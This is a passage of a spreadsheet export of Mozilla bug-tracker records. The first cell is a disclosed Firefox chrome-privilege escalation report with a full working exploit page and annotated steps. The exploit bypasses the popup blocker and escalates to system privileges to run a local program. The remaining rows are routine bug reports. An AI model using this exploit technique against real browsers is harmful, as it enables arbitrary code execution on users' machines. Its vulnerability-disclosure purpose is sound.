#define FORWARD_TO_OUTER(method, args, err_rval)                              \
  PR_BEGIN_MACRO                                                              \
  if (IsInnerWindow()) {                                                      \
    nsGlobalWindow *outer = GetOuterWindowInternal();                         \
    if (!HasActiveDocument()) {                                               \
      NS_WARNING(outer ?                                                      \
                 "Inner window does not have active document." :              \
                 "No outer window available!");                               \
      return err_rval;                                                        \
    }                                                                         \
    return outer-&gt;method args;                                                \
  }                                                                           \
&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;
HasActiveDocument() checks for IsCurrentInnerWindow(), which returns false for unloaded inner windows. This prevents users from performing operations in the context of the outer window, now potentially hosting a document from another origin.
This affects window.open() among other things. However, for this particular method, a workaround exists. When document.open() is called with 3 or more arguments, the call is forwarded to window.open():
&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt; nsHTMLDocument.cpp &gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;
nsHTMLDocument::Open(JSContext* /* unused */,
                     const nsAString&amp; aURL,
                     const nsAString&amp; aName,
                     const nsAString&amp; aFeatures,
                     bool aReplace,
                     ErrorResult&amp; rv)
{
  NS_ASSERTION(nsContentUtils::CanCallerAccess(static_cast&lt;nsIDOMHTMLDocument*&gt;(this)),
               "XOW should have caught this!");
  nsCOMPtr&lt;nsIDOMWindow&gt; window = GetWindow();
  if (!window) {
    rv.Throw(NS_ERROR_DOM_INVALID_ACCESS_ERR);
    return nullptr;
  }
  nsCOMPtr&lt;nsIDOMJSWindow&gt; win = do_QueryInterface(window);
  nsCOMPtr&lt;nsIDOMWindow&gt; newWindow;
  // XXXbz We ignore aReplace for now.
  rv = win-&gt;OpenJS(aURL, aName, aFeatures, getter_AddRefs(newWindow));
  return newWindow.forget();
}
&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;
Here, GetWindow() returns the outer window. Thus, OpenJS is called directly on the outer window, and FORWARD_TO_OUTER won't raise any error in nsGlobalWindow::OpenInternal.
This bug can be leveraged to open a new pop-up window when the outer window's active document is chrome-privileged:
&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt; nsGlobalWindow.cpp &gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;
bool
nsGlobalWindow::PopupWhitelisted()
{
  if (!IsPopupBlocked(mDoc))                           &lt;&lt;&lt; mDoc is the XUL document currently loaded in the frame
    return true;
(...)
}
(...)
bool IsPopupBlocked(nsIDocument* aDoc)
{
  nsCOMPtr&lt;nsIPopupWindowManager&gt; pm =
    do_GetService(NS_POPUPWINDOWMANAGER_CONTRACTID);
(...)
  uint32_t permission = nsIPopupWindowManager::ALLOW_POPUP;
  pm-&gt;TestPermission(aDoc-&gt;NodePrincipal(), &amp;permission);        &lt;&lt;&lt; permission is tested against the system principal...
  return permission == nsIPopupWindowManager::DENY_POPUP;        &lt;&lt;&lt; ... which allows pop-ups, so this returns false
}
&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;
When a "chrome:" URI is opened in a new window and the "chrome" option is specified as the third argument to document.open(), the URI is opened in a type=chrome window. Chrome windows provide 2 important benefits:
A) They define messageManager, which several chrome pages, such as browser.xul, require to function properly. Due to the missing messageManager, the browser.xul instance which was opened in the content frame threw a script error early on.
B) javascript: URIs opened from such docshells can inherit the system principal.
The feature A) allows browser.js (a script file included from browser.xul) to execute code responsible for reopening the sidebar from the opener window. Since the chrome window hosting browser.xul is being opened from an iframe in the content land, the values browser.js will read from the opener, including the URI of the sidebar, are user-controlled. The exploit replaces the contents of the opener iframe immediately after the call to document.open():
var s = "document.open('chrome://browser/content','','chrome'); location = u";
Where "u" is the URI of the data: document containing the "sidebar" element: &lt;img id="sidebar" src="javascript:code()"&gt; -- and a few others to ensure that browser.js doesn't throw when it tries to read them via the opener reference.
The feature B) mentioned above ensures that |javascript:code()| reopened in the chrome window's sidebar inherits the system-principal from the enclosing browser.xul document. As soon as this happens, the browser is compromised.
-------
EXPLOIT
-------
Here's the exploit code with some additional notes:
&lt;!DOCTYPE html&gt;
&lt;iframe name="i" style="display:none"&gt;&lt;/iframe&gt;                                       &lt;&lt;&lt; 1
&lt;script&gt;
i.u = "data:text/html," + String(function(){/*#                                       &lt;&lt;&lt; 2
  &lt;form id="sidebar-box" sidebarcommand="frame"&gt;&lt;img name="boxObject"&gt;&lt;/form&gt;         &lt;&lt;&lt; 3
  &lt;img id="sidebar-title"&gt;                                                            &lt;&lt;&lt; 4
  &lt;img id="sidebar"&gt;                                                                  &lt;&lt;&lt; 5
  &lt;script&gt;
    var s = document.getElementById("sidebar");
    s.src = "javascript:C=Components;c=C.classes;i=C.interfaces;" +
            "f=c['@mozilla.org/file/local;1'].createInstance(i.nsILocalFile);" +
            "p=c['@mozilla.org/process/util;1'].createInstance(i.nsIProcess);" +
            "f.initWithPath('C:\\\\Windows\\\\System32\\\\cmd.exe');" +
            "p.init(f);p.run(0,['/kcalc.exe'],1);top.close()";&lt;/#
*/}).match(/#([\s\S]+)#/)[1] + "script&gt;";
var s = "document.open('chrome://browser/content','','chrome'); location = u";        &lt;&lt;&lt; 6
var e = i.eval.bind(0,s);
var c = new mozRTCPeerConnection;
c.createOffer(Map,open.bind(top,"chrome://browser/content","i"));                     &lt;&lt;&lt; 7
setTimeout("c.createOffer(Map,e)",1000);                                              &lt;&lt;&lt; 8
&lt;/script&gt;
1. This is the iframe a chrome-privileged page will be loaded in. No source is specified, so it initially loads a same-origin about:blank document. It'll be used to call open() on the outer window after the frame has navigated to the chrome page.
2. The variable |u| stores the URI of the document which the chrome window will see as the opener. Below are its elements.
3. This is to satisfy the following opener references in browser.js, function gBrowserInit.onLoad():
&gt;&gt;&gt;&gt;&gt;&gt;
      let openerSidebarBox = window.opener.document.getElementById("sidebar-box");
(...)
        let sidebarCmd = openerSidebarBox.getAttribute("sidebarcommand");
        let sidebarCmdElem = document.getElementById(sidebarCmd);
(...)
          sidebarBox.setAttribute("width", openerSidebarBox.boxObject.width);
&lt;&lt;&lt;&lt;&lt;&lt;
|sidebarCmd| must be a valid element id from the browser.xul document, "frame" is the shortest one.
4. This is to satisfy the following opener reference in browser.js, function gBrowserInit.onLoad():
&gt;&gt;&gt;&gt;&gt;&gt;
          sidebarTitle.setAttribute(
            "value", window.opener.document.getElementById("sidebar-title").getAttribute("value"));
&lt;&lt;&lt;&lt;&lt;&lt;
5. This is the element whose "src" attribute contains the URI to be opened in the privileged context:
&gt;&gt;&gt;&gt;&gt;&gt;
          sidebarBox.setAttribute(
            "src", window.opener.document.getElementById("sidebar").getAttribute("src"));
&lt;&lt;&lt;&lt;&lt;&lt;
6. Code that will be executed in the about:blank context after the frame has navigated to a chrome page. It's OK if |location| is assigned after the call to document.open, because it takes longer to open the chrome window than to load the data: URI in the frame.
7. The actual action starts here. The first bug is exploited to open a privileged page in the frame.
8. Since #7 happens asynchronously, the next step must be delayed. The chrome page must be loaded before the pop-up blocker bypass with document.open is attempted, but there's one more reason to wait, related to how garbage collection works in Firefox. Shortly after the about:blank document is navigated away, all chrome-to-content object wrappers are nuked and replaced with a DeadObjectProxy, which throws on every access. If GC occured after the bound eval had been wrapped in the call to createOffer, but before the error callback is invoked, the exploit would fail. A 1000ms timeout provides plenty of time for both navigation and GC.
Also, note that the free security pass bug must be reused because document.open would fail to open a privileged page without it -- even if open is called on the outer window with a privileged document, the chrome compartment is never entered, so a separate bypass is needed to ensure that the chrome URI is accepted.</t>
        </is>
      </c>
      <c r="X522" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="523">
      <c r="A523" t="n">
        <v>1377898</v>
      </c>
      <c r="B523" t="inlineStr">
        <is>
          <t>2017-07-03 08:48:01 -0700</t>
        </is>
      </c>
      <c r="C523" t="inlineStr">
        <is>
          <t>Add overall population counts to experiment aggregates</t>
        </is>
      </c>
      <c r="D523" t="inlineStr">
        <is>
          <t>2022-07-26 12:18:01 -0700</t>
        </is>
      </c>
      <c r="E523" t="n">
        <v>1</v>
      </c>
      <c r="F523" t="n">
        <v>1</v>
      </c>
      <c r="G523" t="n">
        <v>2</v>
      </c>
      <c r="H523" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I523" t="inlineStr">
        <is>
          <t>Data Platform and Tools</t>
        </is>
      </c>
      <c r="J523" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K523" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L523" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M523" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N523" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O523" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P523" t="inlineStr"/>
      <c r="Q523" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R523" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S523" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T523" t="n">
        <v>1</v>
      </c>
      <c r="U523" t="n">
        <v>0</v>
      </c>
      <c r="V523" t="n">
        <v>2</v>
      </c>
      <c r="W523" t="inlineStr">
        <is>
          <t>We should surface the overall client ID counts as well as main ping counts in the experiment viewer. We could add it as a new metric type, or I'm leaning toward having one special metric aggregate that's top-level for the experiment/branch and includes an array of counts/overall statistics</t>
        </is>
      </c>
      <c r="X523" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="524">
      <c r="A524" t="n">
        <v>388333</v>
      </c>
      <c r="B524" t="inlineStr">
        <is>
          <t>2007-07-16 12:55:23 -0700</t>
        </is>
      </c>
      <c r="C524" t="inlineStr">
        <is>
          <t>Create linux buildbot slave VM by copying prometheus-vm</t>
        </is>
      </c>
      <c r="D524" t="inlineStr">
        <is>
          <t>2013-08-12 21:54:08 -0700</t>
        </is>
      </c>
      <c r="E524" t="n">
        <v>1</v>
      </c>
      <c r="F524" t="n">
        <v>1</v>
      </c>
      <c r="G524" t="n">
        <v>5</v>
      </c>
      <c r="H524" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I524" t="inlineStr">
        <is>
          <t>Release Engineering</t>
        </is>
      </c>
      <c r="J524" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K524" t="inlineStr">
        <is>
          <t>other</t>
        </is>
      </c>
      <c r="L524" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M524" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N524" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O524" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P524" t="inlineStr"/>
      <c r="Q524" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R524" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S524" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T524" t="n">
        <v>1</v>
      </c>
      <c r="U524" t="n">
        <v>0</v>
      </c>
      <c r="V524" t="n">
        <v>6</v>
      </c>
      <c r="W524" t="inlineStr">
        <is>
          <t>To test build automation, we need a linux buildbot slave. This needs to run in a VM which contains the exact same bits as we currently use in prometheus-vm.
Once the new VM is copied and running, we can add buildbot slave config files and see what happens!</t>
        </is>
      </c>
      <c r="X524" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="525">
      <c r="A525" t="n">
        <v>1764778</v>
      </c>
      <c r="B525" t="inlineStr">
        <is>
          <t>2022-04-14 07:54:07 -0700</t>
        </is>
      </c>
      <c r="C525" t="inlineStr">
        <is>
          <t>PSpeechSynthesis can be started by a compromised child process even with the pref disabled</t>
        </is>
      </c>
      <c r="D525" t="inlineStr">
        <is>
          <t>2023-01-16 20:23:26 -0800</t>
        </is>
      </c>
      <c r="E525" t="n">
        <v>1</v>
      </c>
      <c r="F525" t="n">
        <v>1</v>
      </c>
      <c r="G525" t="n">
        <v>3</v>
      </c>
      <c r="H525" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I525" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J525" t="inlineStr">
        <is>
          <t>Web Speech</t>
        </is>
      </c>
      <c r="K525" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L525" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M525" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N525" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O525" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P525" t="inlineStr">
        <is>
          <t>[adv-main100+r][adv-esr91.9+r]</t>
        </is>
      </c>
      <c r="Q525" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R525" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="S525" t="inlineStr">
        <is>
          <t>101 Branch</t>
        </is>
      </c>
      <c r="T525" t="n">
        <v>1</v>
      </c>
      <c r="U525" t="n">
        <v>0</v>
      </c>
      <c r="V525" t="n">
        <v>14</v>
      </c>
      <c r="W525" t="inlineStr">
        <is>
          <t>The method ContentParent::AllocPSpeechSynthesisParent() is used to create a new SpeechSynthesisParent if the child process sends the parent process a message. However, this method does not check that speech synthesis is enabled. Therefore, if an attacker has achieved arbitrary code execution in a child process, then I think it can start up the speech synthesis IPDL protocol in the parent, exposing Firefox to potential issues with the protocol.</t>
        </is>
      </c>
      <c r="X525" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="526">
      <c r="A526" t="n">
        <v>495057</v>
      </c>
      <c r="B526" t="inlineStr">
        <is>
          <t>2009-05-27 07:03:54 -0700</t>
        </is>
      </c>
      <c r="C526" t="inlineStr">
        <is>
          <t>Crash [@ push_tag] or [@ real_write] if a message with text/enriched part is viewed</t>
        </is>
      </c>
      <c r="D526" t="inlineStr">
        <is>
          <t>2011-06-13 10:01:48 -0700</t>
        </is>
      </c>
      <c r="E526" t="n">
        <v>1</v>
      </c>
      <c r="F526" t="n">
        <v>1</v>
      </c>
      <c r="G526" t="n">
        <v>3</v>
      </c>
      <c r="H526" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I526" t="inlineStr">
        <is>
          <t>MailNews Core</t>
        </is>
      </c>
      <c r="J526" t="inlineStr">
        <is>
          <t>MIME</t>
        </is>
      </c>
      <c r="K526" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L526" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M526" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N526" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O526" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P526" t="inlineStr">
        <is>
          <t>[sg:critical?] (assuming worst case)</t>
        </is>
      </c>
      <c r="Q526" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R526" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S526" t="inlineStr">
        <is>
          <t>Thunderbird 3.0b3</t>
        </is>
      </c>
      <c r="T526" t="n">
        <v>1</v>
      </c>
      <c r="U526" t="n">
        <v>0</v>
      </c>
      <c r="V526" t="n">
        <v>33</v>
      </c>
      <c r="W526" t="inlineStr">
        <is>
          <t>User-Agent:       Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.5) Gecko/2008121621 Ubuntu/8.04 (hardy) Firefox/3.0.10
Build Identifier: Mozilla Thunderbird version 2.0.0.19 (20090105)
A message with this structure:
multipart/mixed
  multipart/related
    multipart/alternative
      text/plain
      text/html
      text/enriched
kills Thunderbird every time.  Let me see if I can attach the actual example...
Reproducible: Always
Steps to Reproduce:
1. Append the attached example to the POP server's mbox folder where it keeps my mail.
2. Hit "Get Mail" in Thunderbird
Actual Results:  
Thunderbird dies, and keeps dying if I log into the POP server.
Expected Results:  
Not crashed!  Display the message, whichever of the alternates it favours.
My colleague's Windows installation (version 2.0.0.12 (20080708)) also dies when she views the evil message.
The only way I can recover is if I hit "Cancel" on the server login prompt, then right-click + delete message (WITHOUT selecting the evil message which would preview it).  Also I have to delete the message from the mbox file.  (vim + :/^From /,$d == win)</t>
        </is>
      </c>
      <c r="X526" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="527">
      <c r="A527" t="n">
        <v>511521</v>
      </c>
      <c r="B527" t="inlineStr">
        <is>
          <t>2009-08-19 14:56:41 -0700</t>
        </is>
      </c>
      <c r="C527" t="inlineStr">
        <is>
          <t>downloading file with RTL override (RLO) presents conflicting filenames</t>
        </is>
      </c>
      <c r="D527" t="inlineStr">
        <is>
          <t>2016-06-22 12:16:36 -0700</t>
        </is>
      </c>
      <c r="E527" t="n">
        <v>1</v>
      </c>
      <c r="F527" t="n">
        <v>1</v>
      </c>
      <c r="G527" t="n">
        <v>6</v>
      </c>
      <c r="H527" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I527" t="inlineStr">
        <is>
          <t>Core Graveyard</t>
        </is>
      </c>
      <c r="J527" t="inlineStr">
        <is>
          <t>File Handling</t>
        </is>
      </c>
      <c r="K527" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L527" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M527" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N527" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O527" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P527" t="inlineStr">
        <is>
          <t>[sg:low]</t>
        </is>
      </c>
      <c r="Q527" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R527" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S527" t="inlineStr">
        <is>
          <t>mozilla1.9.3a1</t>
        </is>
      </c>
      <c r="T527" t="n">
        <v>1</v>
      </c>
      <c r="U527" t="n">
        <v>0</v>
      </c>
      <c r="V527" t="n">
        <v>43</v>
      </c>
      <c r="W527" t="inlineStr">
        <is>
          <t>Created attachment 395411
dialog presented when downloading S[RLO]iva.exe on Mac
When downloading a file with the unicode RTL override character (RLO) in it ("S[RLO]iva.exe"), the file download dialog presents two different filenames: one in the title ("Sexe.avi") and one in the content of the dialog ("Savi.exe").  The RLO character is stripped for the Save dialog later presented. 
This is inconsistent use of the RLO unicode character U+202E.  Perhaps it should just be removed from any downloaded filename.</t>
        </is>
      </c>
      <c r="X527" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="528">
      <c r="A528" t="n">
        <v>1344075</v>
      </c>
      <c r="B528" t="inlineStr">
        <is>
          <t>2017-03-02 16:31:11 -0800</t>
        </is>
      </c>
      <c r="C528" t="inlineStr">
        <is>
          <t>Update new edge to include logic to drop old telemetry pings</t>
        </is>
      </c>
      <c r="D528" t="inlineStr">
        <is>
          <t>2020-11-19 17:11:53 -0800</t>
        </is>
      </c>
      <c r="E528" t="n">
        <v>1</v>
      </c>
      <c r="F528" t="n">
        <v>1</v>
      </c>
      <c r="G528" t="n">
        <v>6</v>
      </c>
      <c r="H528" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I528" t="inlineStr">
        <is>
          <t>Cloud Services Graveyard</t>
        </is>
      </c>
      <c r="J528" t="inlineStr">
        <is>
          <t>Metrics: Pipeline</t>
        </is>
      </c>
      <c r="K528" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L528" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M528" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N528" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O528" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P528" t="inlineStr">
        <is>
          <t>[SvcOps]</t>
        </is>
      </c>
      <c r="Q528" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R528" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S528" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T528" t="n">
        <v>1</v>
      </c>
      <c r="U528" t="n">
        <v>0</v>
      </c>
      <c r="V528" t="n">
        <v>2</v>
      </c>
      <c r="W528" t="inlineStr">
        <is>
          <t>Now that we don't tee traffic to the heka stacks anymore, we front incoming.tmo directly with the new edge. A consequence of this I didn't consider was that we're now receiving and discarding some pings that we don't care about, specifically v2 saved-session pings. We should reintroduce the tee logic that determines what to send to the old infra to the new edge directly, and drop these pings so that they don't propagate through the new pipeline as errors.</t>
        </is>
      </c>
      <c r="X528" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="529">
      <c r="A529" t="n">
        <v>543</v>
      </c>
      <c r="B529" t="inlineStr">
        <is>
          <t>1998-08-27 21:46:16 -0700</t>
        </is>
      </c>
      <c r="C529" t="inlineStr">
        <is>
          <t>Bug list should not be titled "Mozilla bug list"</t>
        </is>
      </c>
      <c r="D529" t="inlineStr">
        <is>
          <t>2012-12-18 20:46:19 -0800</t>
        </is>
      </c>
      <c r="E529" t="n">
        <v>1</v>
      </c>
      <c r="F529" t="n">
        <v>1</v>
      </c>
      <c r="G529" t="n">
        <v>4</v>
      </c>
      <c r="H529" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I529" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J529" t="inlineStr">
        <is>
          <t>Bugzilla-General</t>
        </is>
      </c>
      <c r="K529" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L529" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M529" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N529" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O529" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P529" t="inlineStr"/>
      <c r="Q529" t="inlineStr">
        <is>
          <t>P4</t>
        </is>
      </c>
      <c r="R529" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S529" t="inlineStr">
        <is>
          <t>Bugzilla old</t>
        </is>
      </c>
      <c r="T529" t="n">
        <v>1</v>
      </c>
      <c r="U529" t="n">
        <v>0</v>
      </c>
      <c r="V529" t="n">
        <v>6</v>
      </c>
      <c r="W529" t="inlineStr">
        <is>
          <t>When I asked to give me a list of all Bugzilla bugs in Bugzilla,
buglist.cgi gave me a list titled "Mozilla bug list". I think
you should drop "Mozilla" from the title</t>
        </is>
      </c>
      <c r="X529" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="530">
      <c r="A530" t="n">
        <v>596369</v>
      </c>
      <c r="B530" t="inlineStr">
        <is>
          <t>2010-09-14 13:58:02 -0700</t>
        </is>
      </c>
      <c r="C530" t="inlineStr">
        <is>
          <t>[k] Allow automatic locale detection and article/URL redirect</t>
        </is>
      </c>
      <c r="D530" t="inlineStr">
        <is>
          <t>2010-10-28 15:00:26 -0700</t>
        </is>
      </c>
      <c r="E530" t="n">
        <v>1</v>
      </c>
      <c r="F530" t="n">
        <v>1</v>
      </c>
      <c r="G530" t="n">
        <v>5</v>
      </c>
      <c r="H530" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I530" t="inlineStr">
        <is>
          <t>support.mozilla.org</t>
        </is>
      </c>
      <c r="J530" t="inlineStr">
        <is>
          <t>Knowledge Base Software</t>
        </is>
      </c>
      <c r="K530" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L530" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M530" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N530" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O530" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P530" t="inlineStr"/>
      <c r="Q530" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R530" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S530" t="inlineStr">
        <is>
          <t>2.3</t>
        </is>
      </c>
      <c r="T530" t="n">
        <v>1</v>
      </c>
      <c r="U530" t="n">
        <v>0</v>
      </c>
      <c r="V530" t="n">
        <v>4</v>
      </c>
      <c r="W530" t="inlineStr">
        <is>
          <t>Here's how the article/URL lookup logic should work:
If a locale is not specified in the URL, 
  Set target_locale = UA accept-lang
If requested article slug exists in target_locale
  Serve that article
Else
  Look up the article slug in the en-US KB
  If an en-US article exists
     Serve the target_locale version of that article, and update the URL accordingly
   Else
     404
  EndIf
EndIf
Example 1 - locale specified
en-US article slug: an-enUS-slug
de article slug:    a-de-slug   
browser requests
s.m.c/de/kb/an-enUS-slug
kitsune serves (and redirects to)
s.m.c/de/kb/a-de-slug
Example 2 - no locale specified
en-US article slug: an-enUS-slug
de article slug:    a-de-slug   
browser requests
s.m.c/kb/an-enUS-slug &lt;- no locale specified
kitsune auto-detects locale (de) and serves (and redirects to)
s.m.c/de/kb/a-de-slug</t>
        </is>
      </c>
      <c r="X530" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="531">
      <c r="A531" t="n">
        <v>296850</v>
      </c>
      <c r="B531" t="inlineStr">
        <is>
          <t>2005-06-06 11:03:11 -0700</t>
        </is>
      </c>
      <c r="C531" t="inlineStr">
        <is>
          <t>Frame injection spoofing with targets (bug 246448 returns - SA15601)</t>
        </is>
      </c>
      <c r="D531" t="inlineStr">
        <is>
          <t>2007-04-01 15:08:13 -0700</t>
        </is>
      </c>
      <c r="E531" t="n">
        <v>1</v>
      </c>
      <c r="F531" t="n">
        <v>1</v>
      </c>
      <c r="G531" t="n">
        <v>3</v>
      </c>
      <c r="H531" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I531" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J531" t="inlineStr">
        <is>
          <t>DOM: Navigation</t>
        </is>
      </c>
      <c r="K531" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L531" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M531" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N531" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O531" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P531" t="inlineStr">
        <is>
          <t>[sg:fix] workaround: force new windows to open in tabs</t>
        </is>
      </c>
      <c r="Q531" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R531" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S531" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T531" t="n">
        <v>1</v>
      </c>
      <c r="U531" t="n">
        <v>0</v>
      </c>
      <c r="V531" t="n">
        <v>32</v>
      </c>
      <c r="W531" t="inlineStr">
        <is>
          <t>Frame injection spoofing came back. It was fixed by bug 246448 in Mozilla 1.7
and remained fixed through Firefox 1.0.2
Firefox 1.0.3 and Mozilla 1.7.7 are vulnerable again (as is the trunk/Deer Park).</t>
        </is>
      </c>
      <c r="X531" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="532">
      <c r="A532" t="n">
        <v>478724</v>
      </c>
      <c r="B532" t="inlineStr">
        <is>
          <t>2009-02-16 04:33:00 -0800</t>
        </is>
      </c>
      <c r="C532" t="inlineStr">
        <is>
          <t>NSS build fails on Windows since 20090213.1 nightly build.</t>
        </is>
      </c>
      <c r="D532" t="inlineStr">
        <is>
          <t>2009-02-17 20:56:22 -0800</t>
        </is>
      </c>
      <c r="E532" t="n">
        <v>1</v>
      </c>
      <c r="F532" t="n">
        <v>1</v>
      </c>
      <c r="G532" t="n">
        <v>3</v>
      </c>
      <c r="H532" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I532" t="inlineStr">
        <is>
          <t>NSS</t>
        </is>
      </c>
      <c r="J532" t="inlineStr">
        <is>
          <t>Build</t>
        </is>
      </c>
      <c r="K532" t="inlineStr">
        <is>
          <t>trunk</t>
        </is>
      </c>
      <c r="L532" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
